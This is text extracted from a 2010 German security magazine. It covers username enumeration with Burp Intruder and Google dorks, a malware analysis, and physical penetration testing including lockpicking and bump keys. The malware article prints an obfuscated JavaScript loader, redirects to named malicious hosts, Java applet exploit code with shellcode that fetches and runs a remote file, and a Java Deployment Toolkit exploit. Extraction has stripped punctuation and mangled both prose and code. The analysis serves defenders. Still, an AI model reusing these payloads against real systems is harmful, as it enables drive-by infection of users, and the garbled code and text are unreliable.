Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
